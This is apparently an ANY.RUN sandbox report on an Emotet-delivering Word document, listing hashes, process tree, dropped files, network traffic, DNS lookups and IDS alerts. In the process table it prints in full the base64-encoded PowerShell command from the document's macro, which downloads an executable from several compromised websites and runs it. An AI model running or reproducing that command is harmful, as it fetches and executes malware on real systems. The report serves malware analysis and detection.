analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

sec.accs.docs.com

Full analysis: https://app.any.run/tasks/5de01c7d-56fc-4c11-bde7-6abb39ee0b56
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 21, 2019, 13:50:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 21 07:35:00 2019, Last Saved Time/Date: Thu Mar 21 07:35:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 10, Security: 0
MD5:

77414622B52CBE2F97465E3E9AE9E73F

SHA1:

4087536ADE92307497E855CF2D7C0EADF5D7FB62

SHA256:

1B59EE07745C0E455343916BCD89C08476538B2711972F95AA78ADD465AD1D4A

SSDEEP:

3072:L77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q4PeUizFNVKpoT5WI23:L77HUUUUUUUUUUUUUUUUUUUT52VR2Uic

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 809.exe (PID: 3200)
      • 809.exe (PID: 2320)
      • wabmetagen.exe (PID: 1660)
      • wabmetagen.exe (PID: 2904)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2280)
    • Emotet process was detected

      • wabmetagen.exe (PID: 1660)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2280)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2280)
      • 809.exe (PID: 2320)
    • Application launched itself

      • 809.exe (PID: 3200)
      • wabmetagen.exe (PID: 1660)
    • Starts itself from another location

      • 809.exe (PID: 2320)
    • Connects to server without host name

      • wabmetagen.exe (PID: 2904)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 788)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 788)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 10
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 10
Words: 1
Pages: 1
ModifyDate: 2019:03:21 07:35:00
CreateDate: 2019:03:21 07:35:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 809.exe no specs 809.exe #EMOTET wabmetagen.exe no specs wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
788"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\sec.accs.docs.com.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2280powershell -e JAB6AEQAQQB4AEcAdwBBAD0AKAAnAFMAJwArACcAQQBvAEEARAAnACsAJwBRAEEAQQAnACkAOwAkAHQAQQBvAGMARABCAEQAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAUQBCAGMAVQBvAEIAQQA9ACgAJwBoACcAKwAnAHQAdABwACcAKwAnADoAJwArACcALwAnACsAJwAvAHcAdwB3ACcAKwAnAC4AbQBhAGQAbwBuAG4AYQAnACsAJwBiAGEAJwArACcAbABsAC4AJwArACcAYwAnACsAJwBvAG0ALwB3AHAAJwArACcALQBjAG8AbgB0AGUAbgAnACsAJwB0ACcAKwAnAC8AWABiAGMALwBAACcAKwAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AdwB3ACcAKwAnAHcALgBkAHIAaQB2AGkAbgBnAHcAaQB0AGgAYQByAHIAbwAnACsAJwB3ACcAKwAnAC4AJwArACcAYwBvACcAKwAnAG0ALwB3AHAALQBjAG8AbgAnACsAJwB0AGUAJwArACcAbgAnACsAJwB0AC8AcABsAHUAZwBpAG4AcwAvAHcAOABLAEYAOAA2AC8AJwArACcAQAAnACsAJwBoACcAKwAnAHQAdABwACcAKwAnADoALwAnACsAJwAvAHQAJwArACcAbwB0ACcAKwAnAGUAJwArACcAbQByAHUAcwBzAGkAYQAnACsAJwAuAGMAbwBtACcAKwAnAC8ANgB1AHEAOQB1AGQAJwArACcAawAvAHAAJwArACcAdAAnACsAJwA5AEcALwBAAGgAdAB0AHAAOgAvACcAKwAnAC8AawBhAHoAaQByACcAKwAnAGkAYQBkAC4AYwBvAG0AJwArACcALwAnACsAJwB3AHAAJwArACcALQBhAGQAbQBpACcAKwAnAG4ALwA4AFkAOQAnACsAJwA4AC8AQABoACcAKwAnAHQAdABwADoALwAvAG0AbwAnACsAJwB2AGUAdAByAGEAYwBrACcAKwAnAGUAcgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAE0AWQBzAHcALwAnACkALgAoACcAUwAnACsAJwBwAGwAaQB0ACcAKQAuAEkAbgB2AG8AawBlACgAJwBAACcAKQA7ACQAdABRAEIAMQBBAEEAQQBRAD0AKAAnAHcAJwArACcAWABHAEEAQwBVAEEAJwArACcAVQAnACkAOwAkAGkAQgBBAG8AQQBBAEEAIAA9ACAAKAAnADgAMAAnACsAJwA5ACcAKQA7ACQAWQBBAFUAQQBVAEEAdwA9ACgAJwBXACcAKwAnAGMAQQBCAEEAQQAnACsAJwBBAEQAJwApADsAJAByAFgAUQBvAFEAQQBBAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABpAEIAQQBvAEEAQQBBACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAcgBVAFoAWgB4AFEAVQAgAGkAbgAgACQAbABRAEIAYwBVAG8AQgBBACkAewB0AHIAeQB7ACQAdABBAG8AYwBEAEIARAAuACgAJwBEAG8AJwArACcAdwAnACsAJwBuAGwAbwBhAGQARgBpAGwAZQAnACkALgBJAG4AdgBvAGsAZQAoACQAcgBVAFoAWgB4AFEAVQAsACAAJAByAFgAUQBvAFEAQQBBACkAOwAkAGoAQQBaAEQAUQBBAHcARAA9ACgAJwBRAFUAQwBYAEEAVQAnACsAJwBBACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJAByAFgAUQBvAFEAQQBBACkALgAiAEwAZQBuAGAARwBgAFQAaAAiACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsAJgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAgACQAcgBYAFEAbwBRAEEAQQA7ACQAYgBRAEEAQgBEAFEAPQAoACcAcQBfAEEAQgAnACsAJwBEAEEAJwArACcAQQAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAdwBEADQAbwBaAEcAPQAoACcAYwBVAHgAQQBBAEMAJwArACcAXwAnACkAOwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3200"C:\Users\admin\809.exe" C:\Users\admin\809.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
2320--be10babfC:\Users\admin\809.exe
809.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
1660"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
809.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
2904--9bc43e78C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Version:
8,6,0,1000
Total events
1 714
Read events
1 233
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
788WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR85C1.tmp.cvr
MD5:
SHA256:
2280powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RH3CCRPELXK111M31ZK8.temp
MD5:
SHA256:
2280powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
2280powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf9513.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
788WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:49D078DFAB25D5E3C9BA0DC7191EB69E
SHA256:C4A3368F95BC9CFC3F1A19EBDBC1D83299047F14178D10D8BC1B5B778FC23B4C
788WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:A54D2799E5124FBC57C523DD244DAF11
SHA256:C740CEB53D0AFCFD37DE79B5176D2825C637E8D92E2F96E3F00C84FB446BCFF4
788WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$c.accs.docs.com.docpgc
MD5:EB178EA8F80667AE7A30829688888E15
SHA256:C728DBFDF513390F97FD6D7A256AB7BA3ABD76B38BA8FFB34A1101875CF95A2B
2320809.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:F4A0E4464B1618D257AE4C50D474AE2F
SHA256:ABE3CB945A6F3A19C6ADA0F02A9B445F50EC5489C902D29637EC17CF4093667B
2280powershell.exeC:\Users\admin\809.exeexecutable
MD5:F4A0E4464B1618D257AE4C50D474AE2F
SHA256:ABE3CB945A6F3A19C6ADA0F02A9B445F50EC5489C902D29637EC17CF4093667B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
9
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2280
powershell.exe
GET
403
185.26.122.14:80
http://totemrussia.com/6uq9udk/pt9G/
RU
html
1.14 Kb
suspicious
2280
powershell.exe
GET
200
45.58.115.58:80
http://kaziriad.com/wp-admin/8Y98/
US
executable
365 Kb
suspicious
2280
powershell.exe
GET
301
104.198.58.34:80
http://www.madonnaball.com/wp-content/Xbc/
US
html
178 b
whitelisted
2280
powershell.exe
GET
301
68.183.59.37:80
http://www.drivingwitharrow.com/wp-content/plugins/w8KF86/
US
html
178 b
suspicious
2904
wabmetagen.exe
POST
200.116.26.234:80
http://200.116.26.234/publish/
CO
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2280
powershell.exe
104.198.58.34:443
www.madonnaball.com
Google Inc.
US
whitelisted
2280
powershell.exe
104.198.58.34:80
www.madonnaball.com
Google Inc.
US
whitelisted
2280
powershell.exe
68.183.59.37:80
www.drivingwitharrow.com
DSL Extreme
US
unknown
2904
wabmetagen.exe
200.116.26.234:80
EPM Telecomunicaciones S.A. E.S.P.
CO
malicious
2280
powershell.exe
185.26.122.14:80
totemrussia.com
Hostland LTD
RU
suspicious
2280
powershell.exe
68.183.59.37:443
www.drivingwitharrow.com
DSL Extreme
US
unknown
2280
powershell.exe
45.58.115.58:80
kaziriad.com
Choopa, LLC
US
suspicious

DNS requests

Domain
IP
Reputation
www.madonnaball.com
  • 104.198.58.34
unknown
www.drivingwitharrow.com
  • 68.183.59.37
suspicious
totemrussia.com
  • 185.26.122.14
suspicious
kaziriad.com
  • 45.58.115.58
suspicious

Threats

PID
Process
Class
Message
2280
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2280
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2280
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info